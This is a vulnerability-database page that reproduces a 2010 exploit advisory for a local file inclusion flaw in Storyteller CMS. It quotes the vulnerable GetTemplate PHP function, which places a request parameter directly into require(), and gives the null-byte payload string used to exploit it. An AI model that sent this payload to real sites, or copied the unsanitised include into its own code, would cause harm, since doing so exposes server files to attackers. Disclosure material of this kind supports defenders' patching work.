Lucene search
K

Storyteller CMS Local File Inclusion

🗓️ 14 Sep 2010 00:00:00Reported by BorN To K!LLType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Storyteller CMS Local File Inclusion Vulnerability on GetTemplate Functio

Code
`==  
[~] Title: Storyteller CMS (var) Local File Include Vuln  
[~] Version: n/a  
[~] Link: http://www.esselbach.com/freeware.php?id=2  
==  
[~] Author: BorN To K!LL - h4ck3r  
[~] Contact: [email protected]  
==  
[~] Vuln code:  
in GetTemplate function , line 113 to 127  
  
function GetTemplate($var)  
{   
if (file_exists("templates/$var.tmp.php"))  
{  
require("templates/$var.tmp.php");  
}  
else  
{  
die ("Error: Can't open template $var");  
}   
return $EST_TEMPLATE;   
}  
  
[~] 3xploit:  
/core.php?var=[Local-File]%00  
==  
[#] Greetings:  
  
Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,,  
==  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation